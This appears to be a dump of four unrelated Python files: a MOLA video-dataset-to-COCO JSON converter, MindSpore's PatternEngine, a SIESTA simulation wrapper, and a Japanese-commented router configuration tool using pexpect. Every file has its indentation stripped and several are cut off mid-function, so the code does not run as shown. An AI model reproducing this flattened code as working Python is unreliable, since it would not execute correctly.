annotation: { #rawframes annotation
"category_id": int
"image_id": int,
#"track_id": int, # NOT FOR ACTION, ONLY FOR OBJECT TRACKING
"bbox": [x,y,width,height],
"area": float,
"label_frames": int, # TOTAL NUMBER OF FRAMES OF LABEL category_id
"dataset": int, #dataset_id
# Redundant field for compatibility with COCO scripts
"id": int,
"iscrowd": 0 or 1, (iscrowd=1) are used to label large groups of objects (e.g. a crowd of people)
"segmentation": RLE(iscrowd=1) or [polygon](iscrowd=0),
}
video: {
"id": int,
"name": str,
"width" : int,
"height" : int,
"total_frames": int, # TOTAL NUMBER OF FRAMES OF THE VIDEO
"fps": int,
"dataset": int, #dataset_id
#"metadata": dict, # Metadata about the video - NOT NECESSARY ADDITIONAL DICT
}
video_annotation: {
"id": int,
"category_id": int, #label
"video_id": int,
"time_start": int, #in frames, then it can be converted using the fps
"time_end":int, #in frames
"label_frames": int, # TOTAL NUMBER OF FRAMES OF LABEL category_id
"dataset": int, #dataset_id
}
segment: { #TODO
"id": int,
"category_id": int,
"area": int,
"bbox": [x,y,width,height],
# Redundant field for compatibility with COCO scripts
"iscrowd": 0 or 1,
}
track: { #DOES IT MAKE SENSE TO TRACT ACTIONS INSIDE THE VIDEO? NO- ONLY OBJECTS
"id": int,
"category_id": int,
"video_id": int
}
"""
# ## SETUP
import platform
import json
import os
from tqdm import tqdm
import argparse
import datetime
# ## Functions
def init_json(file='mola.json'):
output = {
"info": None,
"licenses": [],
"categories": [],
"videos": [],
"images": [],
"tracks": [],
"segment_info": [],
"annotations": [],
"video_annotations": [],
"datasets": [] #[{'name': 'COCO', 'id': 1}, {'name': 'TAO', 'id': 2}]
}
output['info'] = {
"description": "MOLA Dataset",
"url": "",
"version": "1",
"year": 2021,
"date_created": datetime.datetime.utcnow().isoformat(' ')
}
with open(file, 'w') as f:
json.dump(output, f)
print("JSON INITIATED : {}".format(file))
def parse_path(path):
parsed_path = path.replace('\\', '/')
parsed_path = parsed_path.replace('\ ', '/')
return parsed_path
def fix_pahts(gt):
#fix gt datasource
paths=gt['gTruth']['DataSource']
if isinstance(paths, dict) and 'Source' in paths: paths=paths['Source']
originalpath=paths[0]
for p in paths:
if p.find("gt") >-1 :
originalpath=p
break
originalpath=parse_path(originalpath)
paths=[parse_path(p) for p in paths]
paths = ['/'.join(originalpath.split('/')[:-1]+[p.split('/')[-1]]) if p.find("MATLAB") > -1 else p for p in paths] #remove MATLAB BUG: 'C:\\Tools\\MATLAB\\R2020a\\examples\\symbolic\\data\\196.png'
paths = ['/'.join(p.split('/')[-7:]) for p in paths] #remove root dir
gt['gTruth']['DataSource']=paths
return gt
def import_categories(molajson, gt, start_id=0):
dataset=molajson["datasets"][0]['id']
# IMPORT categories name and id
cat_l=[]
cat_l_id=[]
cat_l_dset=[]
cat=gt['gTruth']['LabelDefinitions']
for i,c in enumerate(tqdm(cat)):
cat_l.append(c['Name'])
cat_l_id.append(start_id+i+1) # id start from 1
cat_l_dset.append(dataset) # dataset index
molajson['categories'].append({'name':cat_l[i],'id':cat_l_id[i],'dataset':cat_l_dset[i]})
# ADDITIONAL CATEGORIES: MANUAL
name='NONVIOLENT'
cid=len(cat_l)+1
molajson['categories'].append({'name':name,'id':cid,'dataset':dataset})
cat_l.append(name)
cat_l_id.append(cid)
cat_l_dset.append(dataset)
print("\n>> categories:\n", molajson['categories'][-2:])
return molajson, cat_l, cat_l_id, cat_l_dset
def import_videos(molajson, gt, res, start_id=0, sensor="rgb", ext=".mp4"):
dataset=molajson["datasets"][0]['id']
#single-level:
vid=start_id+1
video_l=[]
video_l_id=[]
total_frames=len(gt['gTruth']['DataSource'])
videon='_'.join(gt['gTruth']['DataSource'][0].split('/')[:-3])+'_'+sensor+ext #f'video_{vid}_{sensor}{ext}'
videon=videon.replace(' ','_') # remove trailing spaces in "Session 1"
video='/'.join(gt['gTruth']['DataSource'][0].split('/')[:-3])+'/'+'gt'+'/'+videon
video_l.append(video)
video_l_id.append(vid)
i=0 #no loop
molajson['videos'].append({'name':video_l[i],
'id':video_l_id[i],
'width': res[sensor][0],
'height': res[sensor][1],
'sensor': sensor,
'fps': res['fps'],
'total_frames': total_frames,
'dataset':dataset})
print("\n>> video:\n", molajson['videos'])
return molajson, video_l, video_l_id
def import_images(molajson, gt, res, start_id=0, video_id=1, sensor="rgb"):
dataset=molajson["datasets"][0]['id']
# images filepath and id
img_l=[]
img_l_id=[]
img=gt['gTruth']['DataSource']
for i,im in enumerate(tqdm(img)):
img_l.append(im)
img_l_id.append(start_id+i+1) # id start from 1
frame_index=img_l[i].split('/')[-1]
frame_index=int(frame_index.split('.')[0])
molajson['images'].append({'file_name':img_l[i],
'id':img_l_id[i],
'video_id':video_id,
'caption':img_l[i].split('/')[-4], # scenario
'width': res[sensor][0],
'height': res[sensor][1],
"frame_index": frame_index,
"date_captured": img_l[i].split('/')[-6],
'dataset':dataset})
print("\n>> images:\n", molajson['images'][-2:])
return molajson, img_l, img_l_id
def create_annotations(molajson, gt, res, cat_l, cat_l_id, cat_l_dset, img_l_id, start_id=0, sensor="rgb"):
dataset=molajson["datasets"][0]['id']
# annotations category_id, image_id, bbox, and dataset
ann_id=[]
ann_catid=[]
ann_imgid=[]
ann_bbox=[]
ann_dset=[]
labels=gt['gTruth']['LabelData']
frames_violent=[i+1 for i,l in enumerate(labels) if l["VIOLENT"]]
frames_nonviolent=[i+1 for i,l in enumerate(labels) if not l["VIOLENT"]]
for i,l in enumerate(tqdm(labels)):
annid=start_id+i+1
#specific - TODO unspecific
catidx=cat_l.index("VIOLENT")
label_frames=frames_violent
if not l["VIOLENT"]:
catidx=cat_l.index("NONVIOLENT")
label_frames=frames_nonviolent
catid=cat_l_id[catidx]
#dataset=cat_l_dset[catidx]
imgidx=i
imgid=img_l_id[imgidx]
bbox=[0, 0, res[sensor][0], res[sensor][1]] # [x,y,width,height], #default RGB
area=res[sensor][0]*res[sensor][1] #default RGB
ann_id.append(annid)
ann_catid.append(catid)
ann_imgid.append(imgid)
ann_bbox.append(bbox)
ann_dset.append(dataset)
molajson['annotations'].append({'id':annid,
'category_id':catid,
'image_id':imgid,
'bbox': bbox,
'area': area,
"label_frames": len(label_frames),
'iscrowd': 0,
'dataset':dataset})
print("\n>> annotations:\n", molajson['annotations'][-2:])
return molajson, ann_id, ann_catid, ann_imgid, ann_bbox, ann_dset
def create_video_annotations(molajson, gt, res, cat_l, cat_l_id, cat_l_dset, video_l_id, start_id=0, sensor="rgb"):
dataset=molajson["datasets"][0]['id']
# annotations category_id, image_id, bbox, and dataset
ann_id=[]
ann_catid=[]
ann_videoid=[]
ann_dset=[]
labels=gt['gTruth']['LabelData']
frames_violent=[i+1 for i,l in enumerate(labels) if l["VIOLENT"]]
frames_nonviolent=[i+1 for i,l in enumerate(labels) if not l["VIOLENT"]]
for i,c in enumerate(tqdm(cat_l)):
annid=start_id+i+1
catidx=i
#specific - TODO unspecific
label_frames=frames_violent
if c=="NONVIOLENT": label_frames=frames_nonviolent
if not label_frames: continue #no frames of this category, therefore video of this category
catid=cat_l_id[catidx]
#dataset=cat_l_dset[catidx]
videoidx=0 #only one video per scenario
videoid=video_l_id[videoidx]
ann_id.append(annid)
ann_catid.append(catid)
ann_videoid.append(videoid)
ann_dset.append(dataset)
molajson['video_annotations'].append({'id':annid,
'category_id':catid,
'video_id':videoid,
'time_start': int(label_frames[0]), #in frames, then it can be converted using the fps
'time_end': int(label_frames[-1]), #in frames
"label_frames": len(label_frames),
'dataset':dataset})
print("\n>> video_annotations:\n", molajson['video_annotations'][-2:])
return molajson, ann_id, ann_catid, ann_videoid, ann_dset
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--root', type=str, default='D:/external_datasets/MOLA/', help='root dir of datasets')
parser.add_argument('--datasets', nargs='+', default=['INCAR'], help='list of datasets')
args = parser.parse_args()
root=args.root
datasets=args.datasets
#Define root dir dependent on OS
rdir=root #WARNING needs to be root datasets
print('OS: {}'.format(platform.platform()))
print('root dir: {}'.format(rdir))
# define resolutions
res = {
'rgb': [2048, 1536], # w,h
'thermal': [640, 512],
'pointcloud': [640, 576],
'fps': 30
}
# FOR LOOP"
datasetsdir = os.listdir(rdir)
missing_gt_json = []
missing_gt_mat = []
label_folder = "gt"
label_fname = "gt2.json"
label_mat_fname = "gt.m"
sensor = "rgb"
ext = ".mp4"
did = 1 # start dataset id
for dataset in datasetsdir:
if dataset in datasets:
daysdir = os.path.join(rdir, dataset)
if not os.path.isdir(daysdir): continue # test if is a folder
days = os.listdir(daysdir)
print(">>>\n EXTRACTING DATASET: " + dataset)
# INIT JSON
molafile = rdir + dataset + '/' + 'mola.json'
init_json(file=molafile)
molajson = json.load(open(molafile))
molajson['datasets'] = [
{'name': dataset, 'id': did}] # [{'name': d, 'id': i+1} for i,d in enumerate(datasets)]
did += 1 # nem dataset added
with open(molafile, 'w') as f:
json.dump(molajson, f)
# INIT VARS
imported_cats = False # import cats from each dataset
cat_start_id = 0
video_start_id = 0
img_start_id = 0
ann_start_id = 0
vid_ann_start_id = 0
cat_l, cat_l_id, cat_l_dset = [], [], []
video_l, video_l_id = [], []
img_l, img_l_id = [], []
ann_id, ann_catid, ann_imgid, ann_bbox, ann_dset = [], [], [], [], []
vid_ann_id, vid_ann_catid, ann_videoid, vid_ann_dset = [], [], [], []
# FOR LOOP
for day in days:
sessiondir = os.path.join(daysdir, day)
if not os.path.isdir(sessiondir): continue # test if is a folder
sessions = os.listdir(sessiondir)
for session in sessions:
scenariosdir = os.path.join(sessiondir, session)
if not os.path.isdir(scenariosdir): continue # test if is a folder
scenarios = os.listdir(scenariosdir)
for scenario in scenarios:
imgdir = os.path.join(scenariosdir, scenario)
if not os.path.isdir(imgdir): continue # test if is a folder
labeldir = os.path.join(imgdir, label_folder)
# if not os.path.isdir(labeldir): continue #should exist
filename = os.path.join(labeldir, label_fname)
try:
gt = json.load(open(filename))
# fix gt paths
gt = fix_pahts(gt) # gTruth can be also missing missing
except:
print(">>>>>>>MISSING OR BUG gtFILE: ", filename)
missing_gt_json.append(filename)
if not os.path.isfile(
filename.replace(label_fname, label_mat_fname)): missing_gt_mat.append(
filename.replace(label_fname, label_mat_fname))
continue
# update molajson
if not imported_cats: # only imports one time
molajson, cat_l, cat_l_id, cat_l_dset = import_categories(molajson, gt,
start_id=cat_start_id)
imported_cats = True
molajson, video_l, video_l_id = import_videos(molajson, gt, res,
start_id=video_start_id,
sensor=sensor,
ext=ext)
molajson, img_l, img_l_id = import_images(molajson, gt, res,
start_id=img_start_id,
video_id=video_l_id[-1])
molajson, ann_id, ann_catid, ann_imgid, ann_bbox, ann_dset = create_annotations(molajson, gt,
res,
cat_l, cat_l_id,
cat_l_dset,
img_l_id,
start_id=ann_start_id,
sensor=sensor)
molajson, vid_ann_id, vid_ann_catid, ann_videoid, vid_ann_dset = create_video_annotations(
molajson, gt, res,
cat_l, cat_l_id,
cat_l_dset, video_l_id,
start_id=vid_ann_start_id,
sensor=sensor)
# update start ids to the last id
cat_start_id = cat_l_id[-1]
video_start_id = video_l_id[-1]
img_start_id = img_l_id[-1]
ann_start_id = ann_id[-1]
vid_ann_start_id = vid_ann_id[-1]
# | |
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""PatternEngine for modifying SymbolTree by pattern."""
from collections import OrderedDict
from typing import Tuple, Union, List, Type
import abc
from mindspore.nn import Cell
from mindspore import log as logger
from .node_type import NodeType
from .node import Node
from .symbol_tree import SymbolTree
from .tree_node_helper import TreeNodeHelper
class PatternNode:
"""
`PatternNode` is defined as a node while defining pattern.
Args:
pattern_node_name (str): Name of current node.
match_type (Type): A type represents what type would be matched of current node.
inputs (list[PatternNode]): Input nodes of current node.
"""
def __init__(self, pattern_node_name: str, match_type: Type = Type[None], inputs: ['PatternNode'] = None):
self._name = pattern_node_name
self._type = match_type
if inputs is None:
self._inputs = []
else:
self._inputs = inputs
@staticmethod
def from_node(node: Node) -> 'PatternNode':
"""
Create a `PatternNode` from `node`.
Args:
node (Node): Input rewrite node.
Returns:
A `PatternNode` created from `node`.
"""
pattern_node: PatternNode = PatternNode(node.get_targets()[0])
if node.get_node_type() is NodeType.CallCell:
pattern_node._type = node.get_instance_type()
return pattern_node
@staticmethod
def create_pattern_from_node(node: Node) -> 'PatternNode':
"""
Create a Pattern from `node` with its inputs.
Args:
node (Node): Input rewrite node.
Returns:
A `PatternNode` as root of pattern created from rewrite node.
"""
pattern_node: PatternNode = PatternNode.from_node(node)
inputs = []
for node_input in node.get_inputs():
inputs.append(PatternNode.create_pattern_from_node(node_input))
pattern_node._inputs = inputs
return pattern_node
@staticmethod
def create_pattern_from_list(type_list: []) -> 'PatternNode':
"""
Create a Pattern from a cell type list.
Args:
type_list (list[type]): Input cell type list.
Returns:
A `PatternNode` as root of pattern created from cell type list.
"""
last_node = None
for i, cell_type in enumerate(type_list):
cur_node: PatternNode = PatternNode(str(i) + "-" + str(cell_type), cell_type, [])
if last_node is not None:
cur_node._inputs = [last_node]
else:
cur_node._inputs = []
last_node = cur_node
return last_node
def add_input(self, node):
"""
Add an input for current `PatternNode`.
Args:
node (PatternNode): Cell type as an input.
"""
self._inputs.append(node)
def set_inputs(self, inputs):
"""
Set inputs for current `PatternNode`.
Args:
inputs (list[PatternNode]) : Inputs to be set as inputs of current `PatternNode`.
"""
self._inputs = inputs
def match(self, node: Node) -> bool:
"""
Check if current `PatternNode` can match with `node`.
Args:
node (Node) : A rewrite node to be match.
"""
return self._type == node.get_instance_type()
def get_inputs(self):
"""
Getter of inputs.
"""
return self._inputs
def name(self) -> str:
"""
Getter of name.
"""
return self._name
def type(self):
"""
Getter of type.
"""
return self._type
class VarNode(PatternNode):
"""
VarNode is a subclass of `PatternNode` whose `match` method is always return True.
"""
def __init__(self):
super(VarNode, self).__init__("placeholder", Cell, [])
def match(self, node: Node) -> bool:
return node is not None and node.get_handler() is not None
class Replacement(abc.ABC):
"""
Interface of replacement function.
"""
@abc.abstractmethod
def build(self, pattern: PatternNode, is_chain_pattern: bool, matched: OrderedDict) -> [Node]:
"""
Interface define for creating replacement nodes from matched result.
Note:
Return value will be delivered into replace api of `SymbolTree` as argument, return value should follow
restraint of parameter `new_nodes` of `replace` api if `SymbolTree`. See detail in docstring of `replace`
api of `SymbolTree`.
Args:
pattern (PatternNode): A `PatternNode` represents root node of current pattern.
is_chain_pattern (bool): A bool indicated if pattern is a chain pattern or a tree pattern.
matched (OrderedDict): An OrderedDict map from pattern_node name to node represents matched result.
Returns:
A list of instance of `Node` as replacement nodes.
"""
raise NotImplementedError
def __call__(self, pattern: PatternNode, is_chain_pattern: bool, matched: OrderedDict) -> [Node]:
return self.build(pattern, is_chain_pattern, matched)
class PatternEngine:
"""
`PatternEngine` is defined how to transform a `SymbolTree` by `PattenNode`.
Args:
pattern (Union[PatternNode, List]): An instance of `PatternNode` or a cell-type-list to construct `PatternNode`
as root of a pattern.
replacement (callable): A callable define how to generate new_node.
"""
def __init__(self, pattern: Union[PatternNode, List], replacement: Replacement = None):
if isinstance(pattern, PatternNode):
self._is_chain = False
self._replacement: Replacement = replacement
self._pattern: PatternNode = pattern
elif isinstance(pattern, list):
self._is_chain = True
self._replacement: Replacement = replacement
self._pattern: PatternNode = PatternNode.create_pattern_from_list(pattern)
else:
raise RuntimeError("Unsupported pattern define")
def pattern(self) -> PatternNode:
"""
Getter of pattern.
"""
return self._pattern
@staticmethod
def _multi_to_multi_replace(stree: SymbolTree, old_root: Node, matched_dict: OrderedDict,
new_nodes: [Node]) -> Node:
"""
Replace multi-nodes in `stree` by another list of nodes.
Note:
Call replace api of `SymbolTree`, so parameter `new_nodes` has same restraint with parameter `new_nodes` of
`replace` api if `SymbolTree`. See detail in docstring of `replace` api of `SymbolTree`.
Args:
stree (SymbolTree): A `SymbolTree` which replacement will apply on.
old_root (Node): A `Node` represents root of original nodes.
matched_dict (OrderedDict): An instance of OrderedDict as match result, where key is the pattern name, value
is the matched node.
new_nodes (list[Node]): A list of instance of Node as replacement.
"""
to_erase_list = matched_dict.values()
# keep all old nodes' inputs
inputs_dict = {}
for node in to_erase_list:
inputs_dict[node.get_name()] = (node.get_inputs())
# call replace of SymbolTree
new_root = stree.replace(old_root, new_nodes)
# replace only support one-to-one replace or one-to-multi replace, we need to erase nodes except
# cur_node manually
queue: [Node] = [old_root]
while queue:
cur_node: Node = queue.pop(0)
if cur_node in to_erase_list:
if cur_node.get_users():
# if cur_node is depended on by other node, skip now.
# cur_node will be push into queue and be erased later
continue
if stree.get_node(cur_node.get_name()) is not None:
# cur_node is not erased before
stree.erase_node(cur_node)
queue.extend(inputs_dict.get(cur_node.get_name()))
return new_root
def apply(self, stree: SymbolTree) -> bool:
"""
Apply current pattern to a `SymbolTree`.
Note:
Sub-tree node will be supported in the near feature.
Args:
stree (SymbolTree): A `SymbolTree` to be transformed.
Returns:
A bool represents if `stree` been changed.
Raises:
RuntimeError: If `SymbolTree` has no return node.
"""
root: Node = stree.get_return_node()
if root is None:
raise RuntimeError("SymbolTree should be inited and has return node")
changed = False
# IR match
queue: [Node] = [root]
# Why need visited: we don't need or should not to visit same node multi-times because pre-visited node may
# already been erased from SymbolTree.
# When will we visit same node multi-times:
# a
# / \
# / \
# b c
# | |
# | d
# \ /
# \ /
# e
# 1. Visit e, e does not match pattern, add b, d to queue.
# 2. Visit b, b does not match pattern, add a to queue.
# 3. Visit d, d does not match pattern, add c to queue.
# 4. Visit a, a matches pattern and erased from SymbolTree, add xx to queue.
# 5. Visit c, d does not match pattern, add a to queue.
# At step 5, a is visited at second time but a is erased from SymbolTree at step 4.
visited: [Node] = []
while queue:
cur_node: Node = queue.pop(0)
if cur_node is None: # Because inputs of node is allowed to be None in replacement.
continue
if cur_node in visited:
continue
if cur_node.get_node_type() == NodeType.Tree:
subtree = TreeNodeHelper.get_sub_tree(cur_node)
self.apply(subtree)
visited.append(cur_node)
queue.extend(cur_node.get_inputs())
continue
visited.append(cur_node)
matched, matched_dict = self._match(self._pattern, cur_node)
# not matched
if not matched or not PatternEngine._check_match(self._pattern, matched_dict):
queue.extend(cur_node.get_inputs())
continue
# matched
new_nodes: [Node] = []
if self._replacement is not None:
new_nodes: [Node] = self._replacement(self._pattern, self._is_chain, matched_dict)
if not new_nodes: # if replacement is empty, do nothing
queue.extend(cur_node.get_inputs())
else: # replace cur_node with new_nodes
changed = True
root = PatternEngine._multi_to_multi_replace(stree, cur_node, matched_dict, new_nodes)
queue.append(root)
return changed
@staticmethod
def _merge_ordered_dict(dict1: OrderedDict, dict2: OrderedDict) -> OrderedDict:
"""
A static util method to merge two OrderedDict.
Args:
dict1 (OrderedDict): First dict to be merged.
dict2 (OrderedDict): Second dict to be merged.
Returns:
Merged OrderedDict.
"""
merged = dict1.copy()
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 10 20:50:35 2020
@author: awills
"""
import sisl, os, sys
from tqdm import tqdm
import numpy as np
import MDAnalysis as MD
class Simulation():
'''Base class to build other simulations from, primarily for utility functions
like _filefind and others in the future.
'''
def __init__(self):
pass
def _filefind(self, attrp, fext, attr):
'''
Parameters
----------
attrp : arbitrary
Input to method to be evaluated by bool().
If bool(attrp) is True:
If type(attrp) == str and fext in attrp:
the method searches attrp for the file extension fext.
If found, the method assumes this is a file path relative to self.path
and sets self.attr = os.path.join(self.path, attrp)
If attrp is not a string or the file extension is not in the string:
the method searches self.path for the file extension and assumes whatever is found is the file desired
and sets os.path.join(self.path, the first file with matching extension found)
If the file is not found, an error is caught and self.attr is set to None
fext : str
The extension of the file to find.
attr : str
The attribute to set with self.__setattr__(), which determines what it will be retrieved with.
Returns
-------
None. Attributes are set in-place, and if nothing is found then self.attr = None.
'''
#if attr is non-false, look for it in sim directory
if attrp:
#if fext in attr, assume filename
if (type(attrp) == str) and (fext in attrp):
self.__setattr__(attr, os.path.join(self.path, attrp) if type(attrp)==str and fext in attrp.lower() else None)
#else if just T/non-F, look for it
else:
try:
self.__setattr__(attr, os.path.join(self.path,
[i for i in os.listdir(self.path) if fext.lower() in i.lower()][0]))
except IndexError:
#if there is no zero index, empty list and file not found
print("attribute not found: {} ending in {}".format(attr, fext))
self.__setattr__(attr, None)
else:
#keep whatever false value
self.__setattr__(attr, None)
class SiestaSimulation(Simulation):
def __init__(self, path, fdfb=True, fdfext='.fdf'):
'''
Parameters
----------
path : str
Root directory for the simulation, assuming the directory is populated by files generated by
a siesta command.
fdfb : arbitrary, optional
Either a string with SimulationLabel.fdf or a value to be checked by bool().
The default is True.
fdfext : str, optional
The extension for your FDF file, if not standard. The default is '.fdf'.
Returns
-------
None. Updates object in-place:
If fdf is a (non-empty) string and a file in self.path with matching fdfext(ension) is found as an extension,
this sets self.fdfp(ath) to input and self.fdf as a SISL SILE object
If fdf is is not a string, or is a string without matching fdfext(ension),
we look for a file in self.path with matching fdfext(ension) and set self.fdfp as the matching file
and self.fdf as the SISL SILE object returned with that path.
If the fdf retrieval is successful, many attributes are retrieved from the SISL object.
If the default keys we search for are absent, the SISL object returns None.
If the file is not found or specified as False, we set self.fdfp and self.fdf as None.
'''
#base directory of simulation
self.path = path
#fdf can be read in automatically if found; default is specified
self._filefind(attrp=fdfb, fext=fdfext, attr='fdfp')
#set sisl fdf reader
self.fdf = sisl.get_sile(self.fdfp) if self.fdfp else None
#if fdf found, can specify numerous things about the simulation
if self.fdf:
# TODO: expand data read in, add functionality for user input keys to .get()
self.simlabel = self.fdf.get("SimulationLabel")
self.latticeconstant = self.fdf.get('LatticeConstant')
self.latticevectors = np.array([float(v) for i in self.fdf.get("LatticeVectors") for v in i.split()]).reshape(3,3)
self.dt = self.fdf.get('MD.LengthTimeStep')
self.istep = self.fdf.get("MD.InitialTimeStep")
self.fstep = self.fdf.get("MD.FinalTimeStep")
#if both are specified, find number of steps
if self.istep and self.fstep:
self.nsteps = self.fdf.get("MD.FinalTimeStep") - self.fdf.get("MD.InitialTimeStep") + 1 #inclusive of first step
#if only final is specified
elif self.fstep and not self.istep:
self.nsteps = self.fstep
#if number of steps, assume MD simulation as opposed to GO or other
if self.nsteps:
self.simtype= 'md'
self.mdtype = self.fdf.get("MD.TypeOfRun")
#if mdtype is FC, this is a phonon calculation
if self.mdtype.lower() == 'FC'.lower():
self.simtype = 'phonon'
#if mdtype is CG, Broyden, or FIRE then it's GO
if self.mdtype.lower() in ['cg', 'broyden', 'fire']:
self.simtype = 'go'
self.natoms = self.fdf.get("NumberOfAtoms")
self.nspecies = self.fdf.get("NumberOfSpecies")
self.chemspeclab = [i.split() for i in self.fdf.get("ChemicalSpeciesLabel")]
def iMD(self, ani=None, fext='.ANI', defaultcell=True):
'''
Parameters
----------
ani : arbitrary, optional
Either a string with SimulationLabel.ANI or a value to be checked by bool().
The default is None.
fext : str, optional
The extension for your ANI file, if not standard. The default is '.ANI'.
defaultcell : bool, optional
* Only used if self.fdf and self.latticeconstant and self.latticevectors are not False*
If True, an estimation of the simulation cell size is made.
The estimation is made by making a cubic cell 10% larger than the largest displacement along the trajectory.
The default is True.
Returns
-------
None. Updates object in-place:
If ani is a (non-empty) string and a file in self.path with matching aniext(ension) is found as an extension,
this sets self.anip(ath) to input and self.ani as an MDAnalysis.Universe object
If ani is is not a string, or is a string without matching aniext(ension),
we look for a file in self.path with matching aniext(ension) and set self.anip as the matching file
and self.ani as the MDAnalysis.Universe object returned with that path.
If the file is not found or specified as False, we set self.anip as None.
If the file is found an a Universe is made:
If an FDF is already set with cell dimensions and a timestep specified,
we update the Universe and its trajectory to include relevant information.
If there is no FDF information, we populate with assumed defaults:
dt = 0.5 ps
MD simulation with Verlet time evolution
natoms, nsteps, and nspecies dependent on the input .ANI
The default cell dependent on maximum displacement between coordinates in trajectory.
*This is likely to GREATLY overestimate cell size when coordinates are not wrapped.*
'''
#first look for ani file
self._filefind(ani, fext, 'anip')
#make sure there is one
assert self.anip, "{} file not found in simulation directory.".format(fext)
if (self.fdf) and (self.latticeconstant) and (self.latticevectors.tolist()):
self.universe = MD.Universe(self.anip, topology_format='xyz',
format='xyz', dt=self.dt)
#update topology with information from fdf
#triclinic_dimensions attribute to allow cell specification for generic cell
self.universe.triclinic_dimensions = self.latticeconstant*self.latticevectors
#default to femtoseconds in siesta
self.universe.trajectory.units['time'] = 'fs'
else:
self.universe = MD.Universe(self.anip, topology_format='xyz',
format='xyz', dt=0.5)
#populate default assumptions
self.simtype = "md"
self.mdtype = "verlet"
self.natoms = self.universe.trajectory.n_atoms
self.nsteps = self.universe.trajectory.n_frames
self.nspecies = len(set(self.universe.atoms.types))
if defaultcell:
mins = []
maxs = []
#this will GREATLY overestimate size if a periodic calculation's coordinate output
#is not wrapped
print("Calculating default cell...")
for frame in tqdm(self.universe.trajectory, file=sys.stdout):
xyz = frame.positions
maxs.append(xyz.max())
mins.append(xyz.min())
cell_size = max(maxs) - min(mins)
#set size to 10% greater than max-min of coordinates, cubic
self.universe.dimensions = 3*[cell_size*1.1] + 3*[90]
def iMDE(self, mde=None, fext='.MDE'):
'''
Parameters
----------
mde : arbitrary, optional
Either a string with SimulationLabel.MDE or a value to be checked by bool().
The default is None.
fext : str, optional
The file extension for the MDE file, if not standard. The default is '.MDE'.
Returns
-------
None. Updates object in-place:
IF FOUND:
COLUMNS ARE Step, T (K), E_KS (eV), E_tot (eV), Vol (A^3), P (kBar)
If mde is a (non-empty) string and a file in self.path with matching mdeext(ension) is found as an extension,
this sets self.mdep(ath) to input and self.mde as an np.ndarray object with shape (nsteps, 6)
If mde is is not a string, or is a string without matching mdeext(ension),
we look for a file in self.path with matching mdeext(ension) and set self.mdep as the matching file
and self.mde as the np.ndarray object with shape (nsteps, 6) with that path.
If the file is not found or specified as False, we set self.mdep as None.
'''
#first look for mde file
self._filefind(mde, fext, 'mdep')
#make sure there is one
| |
import json
import os
import sys
import re
from time import sleep
import time
import pexpect # 追加ライブラリ
import jinja2 # 追加ライブラリ
from termcolor import colored, cprint # 追加ライブラリ
def doNgconf(filename):
# config の中身を解析する
routerconfig, sendlines = readrouterconfig(filename)
# ログファイル名の作成
nowstr = time.strftime('%Y%m%d%H%M%S')
filewithoutext, fileext = os.path.splitext(filename)
logfilename = filewithoutext + "_" + nowstr + ".log"
if routerconfig["routertype"] == "rtx-ssh":
rtx_ssh_login(routerconfig, sendlines, logfilename)
elif routerconfig["routertype"] == "rtx-telnet":
rtx_telnet_login(routerconfig, sendlines, logfilename)
elif routerconfig["routertype"] == "ix-telnet":
ix_telnet_login(routerconfig, sendlines, logfilename)
elif routerconfig["routertype"] == "ix-direct":
ix_direct_login(routerconfig, sendlines, logfilename)
elif routerconfig["routertype"] == "century-direct":
century_direct_login(routerconfig, sendlines, logfilename)
elif routerconfig["routertype"] == "edgecore-telnet":
edgecore_telnet_login(routerconfig, sendlines, logfilename)
elif routerconfig["routertype"] == "edgecore-direct":
edgecore_direct_login(routerconfig, sendlines, logfilename)
else:
print("unknown routertype: " + routerconfig["routertype"])
return logfilename
class ConfigHolder(object):
def __init__(self):
self.configFile = ""
self.outputFile = ""
self.regexFile = []
self.renotFile = []
def __str__(self):
return "configFile: " + self.configFile + "\tregexFile: " + ",".join(self.regexFile) + "\trenotFile: " + ",".join(self.renotFile)
def confirmToRun(self):
with open(self.configFile) as f1:
print(colored("========投入 " + self.configFile, 'cyan'))
print(f1.read())
for r in self.regexFile:
with open(r) as f2:
print(colored("========検証 " + r, 'cyan'))
print(f2.read())
for r in self.renotFile:
with open(r) as f2:
print(colored("\n========存在しない検証 " + r, 'cyan'))
print(f2.read())
input(colored("実行するには Enter を押して下さい", 'cyan'))
return True
def Run(self):
logfilename = doNgconf(self.configFile)
for r in self.regexFile:
with open(r) as f2:
print(colored("\n========検証 " + r, 'cyan'))
print(f2.read())
if not checkre(r, logfilename):
print(colored("XXXXXXXX検証に失敗しました " + r + "\n", 'red'))
raise Exception()
else:
print(colored("========検証に成功しました " + r + "\n", 'green'))
for r in self.renotFile:
with open(r) as f2:
print(colored("\n========存在しない検証 " + r, 'cyan'))
print(f2.read())
if checkre(r, logfilename):
print(colored("XXXXXXXX検証に失敗しました " + r + "\n", 'red'))
raise Exception()
else:
print(colored("========検証に成功しました " + r + "\n", 'green'))
@staticmethod
def appendFile(filename, result):
resultlen = len(result)
if filename.endswith(".re"):
result[resultlen-1].regexFile.append(filename)
elif filename.endswith(".nre"):
result[resultlen-1].renotFile.append(filename)
else:
holder = ConfigHolder()
holder.configFile = filename
result.append(holder)
return result
def expandTemplate(dict, templatedir, outputdir):
'''
expandTemplate
templatedir にあるテンプレートファイルについて、
dict をパラメータとして展開したファイルを
outputdir に生成する
'''
templateLoader = jinja2.FileSystemLoader(searchpath=templatedir)
templateEnv = jinja2.Environment(loader=templateLoader)
result = []
for templateFilename in [x for x in templateEnv.list_templates() if x.find("/") == -1]:
outputpath = os.path.join(
outputdir, dict["id"] + "_" + templateFilename)
print(templateFilename)
template = templateEnv.get_template(templateFilename)
outputText = template.render(dict)
with open(outputpath, "w") as fp:
fp.write(outputText)
# result.append(outputpath)
result = ConfigHolder.appendFile(outputpath, result)
return result
def readrouterconfig(filename):
'''
readrouterconfig
1行目を JSON として解釈し、辞書にして タプルの第一要素として返す
2行目以降を タプルの第二要素として返す
1行目のJSONの 値 について、 $ で始まる値については環境変数を参照して展開する
'''
#
with open(filename, "r") as fp:
